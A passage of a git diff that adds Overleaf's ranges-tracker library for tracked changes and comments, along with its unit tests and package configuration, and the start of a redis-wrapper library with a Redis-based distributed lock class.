{}, + removed: {}, + added: {}, + }, + } + } + + getIdSeed() { + return this.id_seed + } + + setIdSeed(seed) { + this.id_seed = seed + this.id_increment = 0 + } + + static generateIdSeed() { + // Generate a the first 18 characters of Mongo ObjectId, leaving 6 for the increment part + // Reference: https://github.com/dreampulse/ObjectId.js/blob/master/src/main/javascript/Objectid.js + const pid = Math.floor(Math.random() * 32767).toString(16) + const machine = Math.floor(Math.random() * 16777216).toString(16) + const timestamp = Math.floor(new Date().valueOf() / 1000).toString(16) + return ( + '00000000'.substr(0, 8 - timestamp.length) + + timestamp + + '000000'.substr(0, 6 - machine.length) + + machine + + '0000'.substr(0, 4 - pid.length) + + pid + ) + } + + static generateId() { + return this.generateIdSeed() + '000001' + } + + newId() { + this.id_increment++ + const increment = this.id_increment.toString(16) + const id = + this.id_seed + '000000'.substr(0, 6 - increment.length) + increment + return id + } + + getComment(commentId) { + let comment = null + for (const c of this.comments) { + if (c.id === commentId) { + comment = c + break + } + } + return comment + } + + removeCommentId(commentId) { + const comment = this.getComment(commentId) + if (comment == null) { + return + } + this.comments = this.comments.filter(c => c.id !== commentId) + this._markAsDirty(comment, 'comment', 'removed') + } + + moveCommentId(commentId, position, text) { + for (const comment of this.comments) { + if (comment.id === commentId) { + comment.op.p = position + comment.op.c = text + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + getChange(changeId) { + let change = null + for (const c of this.changes) { + if (c.id === changeId) { + change = c + break + } + } + return change + } + + getChanges(ids) { + const idSet = new Set(ids) + return this.changes.filter(change => idSet.has(change.id)) + } + + removeChangeId(changeId) { + this.removeChangeIds([changeId]) + } + + removeChangeIds(ids) { + if (ids == null || ids.length === 0) { + return + } + + const idSet = new Set(ids) + const remainingChanges = [] + for (const change of this.changes) { + if (idSet.has(change.id)) { + this._markAsDirty(change, 'change', 'removed') + } else { + remainingChanges.push(change) + } + } + + this.changes = remainingChanges + } + + validate(text) { + let content + for (const change of this.changes) { + if (change.op.i != null) { + content = text.slice(change.op.p, change.op.p + change.op.i.length) + if (content !== change.op.i) { + throw new Error('insertion does not match text in document') + } + } + } + for (const comment of this.comments) { + content = text.slice(comment.op.p, comment.op.p + comment.op.c.length) + if (content !== comment.op.c) { + throw new Error('comment does not match text in document') + } + } + } + + applyOp(op, metadata) { + if (metadata == null) { + metadata = {} + } + if (metadata.ts == null) { + metadata.ts = new Date() + } + // Apply an op that has been applied to the document to our changes to keep them up to date + if (op.i != null) { + this.applyInsertToChanges(op, metadata) + this.applyInsertToComments(op) + } else if (op.d != null) { + this.applyDeleteToChanges(op, metadata) + this.applyDeleteToComments(op) + } else if (op.c != null) { + this.addComment(op, metadata) + } else { + throw new Error('unknown op type') + } + } + + applyOps(ops, metadata) { + if (metadata == null) { + metadata = {} + } + for (const op of ops) { + this.applyOp(op, metadata) + } + } + + addComment(op, metadata) { + const existing = this.getComment(op.t) + if (existing != null) { + this.moveCommentId(op.t, op.p, op.c) + } else { + let comment + this.comments.push( + (comment = { + id: op.t || this.newId(), + op: { + // Copy because we'll modify in place + c: op.c, + p: op.p, + t: op.t, + }, + metadata, + }) + ) + this._markAsDirty(comment, 'comment', 'added') + } + } + + applyInsertToComments(op) { + for (const comment of this.comments) { + if (op.p <= comment.op.p) { + comment.op.p += op.i.length + this._markAsDirty(comment, 'comment', 'moved') + } else if (op.p < comment.op.p + comment.op.c.length) { + const offset = op.p - comment.op.p + comment.op.c = + comment.op.c.slice(0, +(offset - 1) + 1 || undefined) + + op.i + + comment.op.c.slice(offset) + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + applyDeleteToComments(op) { + const opStart = op.p + const opLength = op.d.length + const opEnd = op.p + opLength + for (const comment of this.comments) { + const commentStart = comment.op.p + const commentEnd = comment.op.p + comment.op.c.length + const commentLength = commentEnd - commentStart + if (opEnd <= commentStart) { + // delete is fully before comment + comment.op.p -= opLength + this._markAsDirty(comment, 'comment', 'moved') + } else if (opStart >= commentEnd) { + // delete is fully after comment, nothing to do + } else { + // delete and comment overlap + let remainingAfter, remainingBefore + if (opStart <= commentStart) { + remainingBefore = '' + } else { + remainingBefore = comment.op.c.slice(0, opStart - commentStart) + } + if (opEnd >= commentEnd) { + remainingAfter = '' + } else { + remainingAfter = comment.op.c.slice(opEnd - commentStart) + } + + // Check deleted content matches delete op + const deletedComment = comment.op.c.slice( + remainingBefore.length, + commentLength - remainingAfter.length + ) + const offset = Math.max(0, commentStart - opStart) + const deletedOpContent = op.d + .slice(offset) + .slice(0, deletedComment.length) + if (deletedComment !== deletedOpContent) { + throw new Error('deleted content does not match comment content') + } + + comment.op.p = Math.min(commentStart, opStart) + comment.op.c = remainingBefore + remainingAfter + this._markAsDirty(comment, 'comment', 'moved') + } + } + } + + applyInsertToChanges(op, metadata) { + let change + const opStart = op.p + const opLength = op.i.length + const opEnd = op.p + opLength + const undoing = !!op.u + + let alreadyMerged = false + let previousChange = null + const movedChanges = [] + const removeChanges = [] + const newChanges = [] + const trackedDeletesAtOpPosition = [] + for (let i = 0; i < this.changes.length; i++) { + change = this.changes[i] + const changeStart = change.op.p + + if (change.op.d != null) { + // Shift any deletes after this along by the length of this insert + if (opStart < changeStart) { + change.op.p += opLength + movedChanges.push(change) + } else if (opStart === changeStart) { + if ( + !alreadyMerged && + undoing && + change.op.d.length >= op.i.length && + change.op.d.slice(0, op.i.length) === op.i + ) { + // If we are undoing, then we want to reject any existing tracked delete if we can. + // Check if the insert matches the start of the delete, and just + // remove it from the delete instead if so. + change.op.d = change.op.d.slice(op.i.length) + change.op.p += op.i.length + if (change.op.d === '') { + removeChanges.push(change) + } else { + movedChanges.push(change) + } + alreadyMerged = true + + // Any tracked delete that came before this tracked delete + // rejection was moved after the incoming insert. Move them back + // so that they appear before the tracked delete rejection. + for (const trackedDelete of trackedDeletesAtOpPosition) { + trackedDelete.op.p -= opLength + } + } else { + // We're not rejecting that tracked delete. Move it after the + // insert. + change.op.p += opLength + movedChanges.push(change) + + // Keep track of tracked deletes that are at the same position as the + // insert. If we find a tracked delete to reject, we'll want to + // reposition them. + if (!alreadyMerged) { + trackedDeletesAtOpPosition.push(change) + } + } + } + } else if (change.op.i != null) { + let offset + const changeEnd = changeStart + change.op.i.length + const isChangeOverlapping = + opStart >= changeStart && opStart <= changeEnd + + // Only merge inserts if they are from the same user + const isSameUser = metadata.user_id === change.metadata.user_id + + // If we are undoing, then our changes will be removed from any delete ops just after. In that case, if there is also + // an insert op just before, then we shouldn't append it to this insert, but instead only cancel the following delete. + // E.g. + // foo|<--- about to insert 'b' here + // inserted 'foo' --^ ^-- deleted 'bar' + // should become just 'foo' not 'foob' (with the delete marker becoming just 'ar'), . + const nextChange = this.changes[i + 1] + const isOpAdjacentToNextDelete = + nextChange != null && + nextChange.op.d != null && + op.p === changeEnd && + nextChange.op.p === op.p + const willOpCancelNextDelete = + undoing && + isOpAdjacentToNextDelete && + nextChange.op.d.slice(0, op.i.length) === op.i + + // If there is a delete at the start of the insert, and we're inserting + // at the start, we SHOULDN'T merge since the delete acts as a partition. + // The previous op will be the delete, but it's already been shifted by this insert + // + // I.e. + // Originally: |-- existing insert --| + // | <- existing delete at same offset + // + // Now: |-- existing insert --| <- not shifted yet + // |-- this insert --|| <- existing delete shifted along to end of this op + // + // After: |-- existing insert --| + // |-- this insert --|| <- existing delete + // + // Without the delete, the inserts would be merged. + const isInsertBlockedByDelete = + previousChange != null && + previousChange.op.d != null && + previousChange.op.p === opEnd + + // If the insert is overlapping another insert, either at the beginning in the middle or touching the end, + // then we merge them into one. + if ( + this.track_changes && + isChangeOverlapping && + !isInsertBlockedByDelete && + !alreadyMerged && + !willOpCancelNextDelete && + isSameUser + ) { + offset = opStart - changeStart + change.op.i = + change.op.i.slice(0, offset) + op.i + change.op.i.slice(offset) + change.metadata.ts = metadata.ts + alreadyMerged = true + movedChanges.push(change) + } else if (opStart <= changeStart) { + // If we're fully before the other insert we can just shift the other insert by our length. + // If they are touching, and should have been merged, they will have been above. + // If not merged above, then it must be blocked by a delete, and will be after this insert, so we shift it along as well + change.op.p += opLength + movedChanges.push(change) + } else if ( + (!isSameUser || !this.track_changes) && + changeStart < opStart && + opStart < changeEnd + ) { + // This user is inserting inside a change by another user, so we need to split the + // other user's change into one before and after this one. + offset = opStart - changeStart + const beforeContent = change.op.i.slice(0, offset) + const afterContent = change.op.i.slice(offset) + + // The existing change can become the 'before' change + change.op.i = beforeContent + movedChanges.push(change) + + // Create a new op afterwards + const afterChange = { + op: { + i: afterContent, + p: changeStart + offset + opLength, + }, + metadata: {}, + } + for (const key in change.metadata) { + const value = change.metadata[key] + afterChange.metadata[key] = value + } + newChanges.push(afterChange) + } + } + + previousChange = change + } + + if (this.track_changes && !alreadyMerged) { + this._addOp(op, metadata) + } + for ({ op, metadata } of newChanges) { + this._addOp(op, metadata) + } + + for (change of removeChanges) { + this._removeChange(change) + } + + for (change of movedChanges) { + this._markAsDirty(change, 'change', 'moved') + } + } + + applyDeleteToChanges(op, metadata) { + const opStart = op.p + const opLength = op.d.length + const opEnd = op.p + opLength + const removeChanges = [] + let movedChanges = [] + + // We might end up modifying our delete op if it merges with existing deletes, or cancels out + // with an existing insert. Since we might do multiple modifications, we record them and do + // all the modifications after looping through the existing changes, so as not to mess up the + // offset indexes as we go. + const opModifications = [] + for (const change of this.changes) { + let changeStart + if (change.op.i != null) { + changeStart = change.op.p + const changeEnd = changeStart + change.op.i.length + if (opEnd <= changeStart) { + // Shift ops after us back by our length + change.op.p -= opLength + movedChanges.push(change) + } else if (opStart >= changeEnd) { + // Delete is after insert, nothing to do + } else { + // When the new delete overlaps an insert, we should remove the part of the insert that + // is now deleted, and also remove the part of the new delete that overlapped. I.e. + // the two cancel out where they overlap. + let deleteRemainingAfter, + deleteRemainingBefore, + insertRemainingAfter, + insertRemainingBefore + if (opStart >= changeStart) { + // |-- existing insert --| + // insertRemainingBefore -> |.....||-- new delete --| + deleteRemainingBefore = '' + insertRemainingBefore = change.op.i.slice(0, opStart - changeStart) + } else { + // deleteRemainingBefore -> |.....||-- existing insert --| + // |-- new delete --| + deleteRemainingBefore = op.d.slice(0, changeStart - opStart) + insertRemainingBefore = '' + } + + if (opEnd <= changeEnd) { + // |-- existing insert --| + // |-- new delete --||.....| <- insertRemainingAfter + deleteRemainingAfter = '' + insertRemainingAfter = change.op.i.slice(opEnd - changeStart) + } else { + // |-- existing insert --||.....| <- deleteRemainingAfter + // |-- new delete --| + deleteRemainingAfter = op.d.slice(changeEnd - opStart) + insertRemainingAfter = '' + } + + const insertRemaining = insertRemainingBefore + insertRemainingAfter + if (insertRemaining.length > 0) { + change.op.i = insertRemaining + change.op.p = Math.min(changeStart, opStart) + movedChanges.push(change) + } else { + removeChanges.push(change) + } + + // We know what we want to preserve of our delete op before (deleteRemainingBefore) and what we want to preserve + // afterwards (deleteRemainingBefore). Now we need to turn that into a modification which deletes the + // chunk in the middle not covered by these. + const deleteRemovedLength = + op.d.length - + deleteRemainingBefore.length - + deleteRemainingAfter.length + const deleteRemovedStart = deleteRemainingBefore.length + const modification = { + d: op.d.slice( + deleteRemovedStart, + deleteRemovedStart + deleteRemovedLength + ), + p: deleteRemovedStart, + } + if (modification.d.length > 0) { + opModifications.push(modification) + } + } + } else if (change.op.d != null) { + changeStart = change.op.p + if ( + opEnd < changeStart || + (!this.track_changes && opEnd === changeStart) + ) { + // Shift ops after us back by our length. + // If we're tracking changes, it must be strictly before, since we'll merge + // below if they are touching. Otherwise, touching is fine. + change.op.p -= opLength + movedChanges.push(change) + } else if (opStart <= changeStart && changeStart <= opEnd) { + if (this.track_changes) { + // If we overlap a delete, add it in our content, and delete the existing change. + // It's easier to do it this way, rather than modifying the existing delete in case + // we overlap many deletes and we'd need to track that. We have a workaround to + // update the delete in place if possible below. + const offset = changeStart - opStart + opModifications.push({ i: change.op.d, p: offset }) + removeChanges.push(change) + } else { + change.op.p = opStart + movedChanges.push(change) + } + } + } + } + + // Copy rather than modify because we still need to apply it to comments + op = { + p: op.p, + d: this._applyOpModifications(op.d, opModifications), + } + + for (const change of removeChanges) { + // This is a bit of hack to avoid removing one delete and replacing it with another. + // If we don't do this, it causes the UI to flicker + if ( + op.d.length > 0 && + change.op.d != null && + op.p <= change.op.p && + change.op.p <= op.p + op.d.length + ) { + change.op.p = op.p + change.op.d = op.d + change.metadata = metadata + movedChanges.push(change) + op.d = '' // stop it being added + } else { + this._removeChange(change) + } + } + + if (this.track_changes && op.d.length > 0) { + this._addOp(op, metadata) + } else { + // It's possible that we deleted an insert between two other inserts. I.e. + // If we delete 'user_2 insert' in: + // |-- user_1 insert --||-- user_2 insert --||-- user_1 insert --| + // it becomes: + // |-- user_1 insert --||-- user_1 insert --| + // We need to merge these together again + const results = this._scanAndMergeAdjacentUpdates() + movedChanges = movedChanges.concat(results.movedChanges) + for (const change of results.removeChanges) { + this._removeChange(change) + movedChanges = movedChanges.filter(c => c !== change) + } + } + + for (const change of movedChanges) { + this._markAsDirty(change, 'change', 'moved') + } + } + + _addOp(op, metadata) { + // Don't take a reference to the existing op since we'll modify this in place with future changes + op = this._clone(op) + const change = { + id: this.newId(), + op, + metadata: this._clone(metadata), + } + this.changes.push(change) + + // Keep ops in order of offset, with deletes before inserts + this.changes.sort(function (c1, c2) { + const result = c1.op.p - c2.op.p + if (result !== 0) { + return result + } else if (c1.op.i != null && c2.op.d != null) { + return 1 + } else if (c1.op.d != null && c2.op.i != null) { + return -1 + } else { + return 0 + } + }) + + this._markAsDirty(change, 'change', 'added') + } + + _removeChange(change) { + this.changes = this.changes.filter(c => c !== change) + this._markAsDirty(change, 'change', 'removed') + } + + _applyOpModifications(content, opModifications) { + // Put in descending position order, with deleting first if at the same offset + // (Inserting first would modify the content that the delete will delete) + opModifications.sort(function (a, b) { + const result = b.p - a.p + if (result !== 0) { + return result + } else if (a.i != null && b.d != null) { + return 1 + } else if (a.d != null && b.i != null) { + return -1 + } else { + return 0 + } + }) + + for (const modification of opModifications) { + if (modification.i != null) { + content = + content.slice(0, modification.p) + + modification.i + + content.slice(modification.p) + } else if (modification.d != null) { + if ( + content.slice( + modification.p, + modification.p + modification.d.length + ) !== modification.d + ) { + throw new Error('deletion does not match text in document') + } + content = + content.slice(0, modification.p) + + content.slice(modification.p + modification.d.length) + } + } + return content + } + + _scanAndMergeAdjacentUpdates() { + // This should only need calling when deleting an update between two + // other updates. There's no other way to get two adjacent updates from the + // same user, since they would be merged on insert. + let previousChange = null + const removeChanges = [] + const movedChanges = [] + for (const change of this.changes) { + if (previousChange?.op.i != null && change.op.i != null) { + const previousChangeEnd = + previousChange.op.p + previousChange.op.i.length + const previousChangeUserId = previousChange.metadata.user_id + const changeStart = change.op.p + const changeUserId = change.metadata.user_id + if ( + previousChangeEnd === changeStart && + previousChangeUserId === changeUserId + ) { + removeChanges.push(change) + previousChange.op.i += change.op.i + movedChanges.push(previousChange) + } + } else if ( + previousChange?.op.d != null && + change.op.d != null && + previousChange?.op.p === change.op.p + ) { + // Merge adjacent deletes + previousChange.op.d += change.op.d + removeChanges.push(change) + movedChanges.push(previousChange) + } else { + // Only update to the current change if we haven't removed it. + previousChange = change + } + } + return { movedChanges, removeChanges } + } + + resetDirtyState() { + this._dirtyState = { + comment: { + moved: {}, + removed: {}, + added: {}, + }, + change: { + moved: {}, + removed: {}, + added: {}, + }, + } + } + + getDirtyState() { + return this._dirtyState + } + + getTrackedDeletesLength() { + let length = 0 + for (const change of this.changes) { + if (change.op.d != null) { + length += change.op.d.length + } + } + return length + } + + _markAsDirty(object, type, action) { + this._dirtyState[type][action][object.id] = object + } + + _clone(object) { + const clone = {} + for (const k in object) { + const v = object[k] + clone[k] = v + } + return clone + } +} + +module.exports = RangesTracker diff --git a/libraries/ranges-tracker/package.json b/libraries/ranges-tracker/package.json new file mode 100644 index 0000000..8aa0a00 --- /dev/null +++ b/libraries/ranges-tracker/package.json @@ -0,0 +1,26 @@ +{ + "name": "@overleaf/ranges-tracker", + "description": "Shared logic for syncing comments and tracked changes with operational transforms", + "main": "index.cjs", + "files": [ + "index.cjs", + "types" + ], + "author": "Overleaf (https://www.overleaf.com)", + "private": true, + "scripts": { + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/ranges-tracker/test/unit/ranges-tracker-test.js b/libraries/ranges-tracker/test/unit/ranges-tracker-test.js new file mode 100644 index 0000000..d207349 --- /dev/null +++ b/libraries/ranges-tracker/test/unit/ranges-tracker-test.js @@ -0,0 +1,225 @@ +const { expect } = require('chai') +const RangesTracker = require('../..') + +describe('RangesTracker', function () { + describe('with duplicate change ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 1, i: 'hello' } }, + { id: 'id2', op: { p: 10, i: 'world' } }, + { id: 'id3', op: { p: 20, i: '!!!' } }, + { id: 'id1', op: { p: 30, d: 'duplicate' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('getChanges() returns all changes with the given ids', function () { + expect(this.rangesTracker.getChanges(['id1', 'id2'])).to.deep.equal([ + this.changes[0], + this.changes[1], + this.changes[3], + ]) + }) + + it('removeChangeIds() removes all changes with the given ids', function () { + this.rangesTracker.removeChangeIds(['id1', 'id2']) + expect(this.rangesTracker.changes).to.deep.equal([this.changes[2]]) + }) + }) + + describe('with duplicate tracked insert ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, i: 'one' } }, + { id: 'id1', op: { p: 20, i: 'two' } }, + { id: 'id1', op: { p: 30, d: 'three' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it("deleting one tracked insert doesn't delete the others", function () { + this.rangesTracker.applyOp({ p: 20, d: 'two' }) + expect(this.rangesTracker.changes).to.deep.equal([ + this.changes[0], + this.changes[2], + ]) + }) + }) + + describe('with duplicate tracked delete ids', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, d: 'one' } }, + { id: 'id1', op: { p: 20, d: 'two' } }, + { id: 'id1', op: { p: 30, d: 'three' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('deleting over tracked deletes in tracked changes mode removes the tracked deletes covered', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 15, + d: '567890123456789012345', + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 15, d: '56789two0123456789three012345' }, + ]) + }) + + it('a tracked delete between two tracked deletes joins them into a single tracked delete', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 20, + d: '0123456789', + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 20, d: 'two0123456789three' }, + ]) + }) + + it("rejecting one tracked delete doesn't reject the others", function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 20, + i: 'two', + u: true, + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([ + { p: 10, d: 'one' }, + { p: 33, d: 'three' }, + ]) + }) + + it("rejecting all tracked deletes doesn't introduce tracked inserts", function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp({ + p: 10, + i: 'one', + u: true, + }) + this.rangesTracker.applyOp({ + p: 23, + i: 'two', + u: true, + }) + this.rangesTracker.applyOp({ + p: 36, + i: 'three', + u: true, + }) + expect(this.rangesTracker.changes.map(c => c.op)).to.deep.equal([]) + }) + }) + + describe('with multiple tracked deletes at the same position', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 50, d: 'right before' } }, + { id: 'id3', op: { p: 50, d: 'this one' } }, + { id: 'id4', op: { p: 50, d: 'right after' } }, + { id: 'id5', op: { p: 75, d: 'long after' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('preserves the text order when rejecting changes', function () { + this.rangesTracker.applyOp( + { p: 50, i: 'this one', u: true }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 50, d: 'right before' } }, + { id: 'id4', op: { p: 58, d: 'right after' } }, + { id: 'id5', op: { p: 83, d: 'long after' } }, + ]) + }) + + it('moves all tracked deletes after the insert if not rejecting changes', function () { + this.rangesTracker.applyOp( + { p: 50, i: 'some other text', u: true, orderedRejections: true }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 33, d: 'before' } }, + { id: 'id2', op: { p: 65, d: 'right before' } }, + { id: 'id3', op: { p: 65, d: 'this one' } }, + { id: 'id4', op: { p: 65, d: 'right after' } }, + { id: 'id5', op: { p: 90, d: 'long after' } }, + ]) + }) + }) + + describe('with multiple tracked deletes at the same position with the same content', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { id: 'id1', op: { p: 10, d: 'cat' } }, + { id: 'id2', op: { p: 10, d: 'giraffe' } }, + { id: 'id3', op: { p: 10, d: 'cat' } }, + { id: 'id4', op: { p: 10, d: 'giraffe' } }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('removes only the first matching tracked delete', function () { + this.rangesTracker.applyOp( + { p: 10, i: 'giraffe', u: true }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes).to.deep.equal([ + { id: 'id1', op: { p: 10, d: 'cat' } }, + { id: 'id3', op: { p: 17, d: 'cat' } }, + { id: 'id4', op: { p: 17, d: 'giraffe' } }, + ]) + }) + }) + + describe('with a tracked insert at the same position as a tracked delete', function () { + beforeEach(function () { + this.comments = [] + this.changes = [ + { + id: 'id1', + op: { p: 5, d: 'before' }, + metadata: { user_id: 'user-id' }, + }, + { + id: 'id2', + op: { p: 10, d: 'delete' }, + metadata: { user_id: 'user-id' }, + }, + { + id: 'id3', + op: { p: 10, i: 'insert' }, + metadata: { user_id: 'user-id' }, + }, + ] + this.rangesTracker = new RangesTracker(this.changes, this.comments) + }) + + it('places a tracked insert at the same position before both the delete and the insert', function () { + this.rangesTracker.track_changes = true + this.rangesTracker.applyOp( + { p: 10, i: 'incoming' }, + { user_id: 'user-id' } + ) + expect(this.rangesTracker.changes.map(change => change.op)).to.deep.equal( + [ + { p: 5, d: 'before' }, + { p: 10, i: 'incoming' }, + { p: 18, d: 'delete' }, + { p: 18, i: 'insert' }, + ] + ) + }) + }) +}) diff --git a/libraries/ranges-tracker/tsconfig.json b/libraries/ranges-tracker/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/ranges-tracker/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/redis-wrapper/.editorconfig b/libraries/redis-wrapper/.editorconfig new file mode 100644 index 0000000..44f520e --- /dev/null +++ b/libraries/redis-wrapper/.editorconfig @@ -0,0 +1,11 @@ +root = true + +[*] +charset = utf-8 +end_of_line = lf +indent_size = 2 +indent_style = space +insert_final_newline = true +max_line_length = 79 +tab_width = 4 +trim_trailing_whitespace = true diff --git a/libraries/redis-wrapper/.gitignore b/libraries/redis-wrapper/.gitignore new file mode 100644 index 0000000..eac2002 --- /dev/null +++ b/libraries/redis-wrapper/.gitignore @@ -0,0 +1,13 @@ +**.swp + +app.js +app/js/ +test/unit/js/ +public/build/ + +node_modules/ + +/public/js/chat.js +plato/ + +.npmrc diff --git a/libraries/redis-wrapper/.mocharc.json b/libraries/redis-wrapper/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/libraries/redis-wrapper/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/libraries/redis-wrapper/.nvmrc b/libraries/redis-wrapper/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/redis-wrapper/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/redis-wrapper/Errors.js b/libraries/redis-wrapper/Errors.js new file mode 100644 index 0000000..b3b3ec0 --- /dev/null +++ b/libraries/redis-wrapper/Errors.js @@ -0,0 +1,15 @@ +const OError = require('@overleaf/o-error') + +class RedisError extends OError {} +class RedisHealthCheckFailed extends RedisError {} +class RedisHealthCheckTimedOut extends RedisHealthCheckFailed {} +class RedisHealthCheckWriteError extends RedisHealthCheckFailed {} +class RedisHealthCheckVerifyError extends RedisHealthCheckFailed {} + +module.exports = { + RedisError, + RedisHealthCheckFailed, + RedisHealthCheckTimedOut, + RedisHealthCheckWriteError, + RedisHealthCheckVerifyError, +} diff --git a/libraries/redis-wrapper/Readme.md b/libraries/redis-wrapper/Readme.md new file mode 100644 index 0000000..e69de29 diff --git a/libraries/redis-wrapper/RedisLocker.js b/libraries/redis-wrapper/RedisLocker.js new file mode 100644 index 0000000..b819ad2 --- /dev/null +++ b/libraries/redis-wrapper/RedisLocker.js @@ -0,0 +1,225 @@ +const { promisify } = require('node:util') +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const os = require('node:os') +const crypto = require('node:crypto') + +const HOST = os.hostname() +const PID = process.pid +const RND = crypto.randomBytes(4).toString('hex') +let COUNT = 0 + +const MAX_REDIS_REQUEST_LENGTH = 5000 // 5 seconds + +const UNLOCK_SCRIPT = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end' + +module.exports = class RedisLocker { + /** + * @param {import('ioredis')} rclient initialized ioredis client + * @param {function(string): string} getKey compose the redis key based on the passed id + * @param {function(Error, string): Error} wrapTimeoutError assign the id to a designated field on the error + * @param {string} metricsPrefix prefix all the metrics with the given prefix + * @param {number} lockTTLSeconds + * + * @example ``` + * const lock = new RedisLocker({ + * rclient, + * getKey(userId) { return `blocking:{userId}` }, + * wrapTimeoutError(err, userId) { err.userId = userId; return err }, + * metricsPrefix: 'user', + * }) + * + * lock.getLock(user._id, (err, value) => { + * if (err) return callback(err) + * // do work + * lock.releaseLock(user._id, callback) + * } + * ``` + */ + constructor({ + rclient, + getKey, + wrapTimeoutError, + metricsPrefix, + lockTTLSeconds = 30, + }) { + if ( + typeof lockTTLSeconds !== 'number' || + lockTTLSeconds < 30 || + lockTTLSeconds >= 1000 + ) { + // set upper limit to 1000s to detect wrong units + throw new Error('redis lock TTL must be at least 30s and below 1000s') + } + + this.rclient = rclient + this.getKey = getKey + this.wrapTimeoutError = wrapTimeoutError + this.metricsPrefix = metricsPrefix + + this.LOCK_TEST_INTERVAL = 50 // 50ms between each test of the lock + this.MAX_TEST_INTERVAL = 1000 // back off to 1s between each test of the lock + this.MAX_LOCK_WAIT_TIME = 10000 // 10s maximum time to spend trying to get the lock + this.LOCK_TTL = lockTTLSeconds // seconds. Time until lock auto expires in redis. + + // read-only copy for unit tests + this.unlockScript = UNLOCK_SCRIPT + + this.promises = { + checkLock: promisify(this.checkLock.bind(this)), + getLock: promisify(this.getLock.bind(this)), + releaseLock: promisify(this.releaseLock.bind(this)), + + // tryLock returns two values: gotLock and lockValue. We need to merge + // these two values into one for the promises version. + tryLock: id => + new Promise((resolve, reject) => { + this.tryLock(id, (err, gotLock, lockValue) => { + if (err) { + reject(err) + } else if (!gotLock) { + resolve(null) + } else { + resolve(lockValue) + } + }) + }), + } + } + + // Use a signed lock value as described in + // https://redis.io/docs/reference/patterns/distributed-locks/#correct-implementation-with-a-single-instance + // to prevent accidental unlocking by multiple processes + randomLock() { + const time = Date.now() + return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}` + } + + /** + * @param {Callback} callback + */ + tryLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const lockValue = this.randomLock() + const key = this.getKey(id) + const startTime = Date.now() + return this.rclient.set( + key, + lockValue, + 'EX', + this.LOCK_TTL, + 'NX', + (err, gotLock) => { + if (err != null) { + return callback(err) + } + if (gotLock === 'OK') { + metrics.inc(this.metricsPrefix + '-not-blocking') + const timeTaken = Date.now() - startTime + if (timeTaken > MAX_REDIS_REQUEST_LENGTH) { + // took too long, so try to free the lock + return this.releaseLock(id, lockValue, function (err, result) { + if (err != null) { + return callback(err) + } // error freeing lock + return callback(null, false) + }) // tell caller they didn't get the lock + } else { + return callback(null, true, lockValue) + } + } else { + metrics.inc(this.metricsPrefix + '-blocking') + return callback(null, false) + } + } + ) + } + + /** + * @param {Callback} callback + */ + getLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const startTime = Date.now() + let testInterval = this.LOCK_TEST_INTERVAL + const attempt = () => { + if (Date.now() - startTime > this.MAX_LOCK_WAIT_TIME) { + const e = this.wrapTimeoutError(new Error('Timeout'), id) + return callback(e) + } + + return this.tryLock(id, (error, gotLock, lockValue) => { + if (error != null) { + return callback(error) + } + if (gotLock) { + return callback(null, lockValue) + } else { + setTimeout(attempt, testInterval) + // back off when the lock is taken to avoid overloading + return (testInterval = Math.min( + testInterval * 2, + this.MAX_TEST_INTERVAL + )) + } + }) + } + attempt() + } + + /** + * @param {Callback} callback + */ + checkLock(id, callback) { + if (callback == null) { + callback = function () {} + } + const key = this.getKey(id) + return 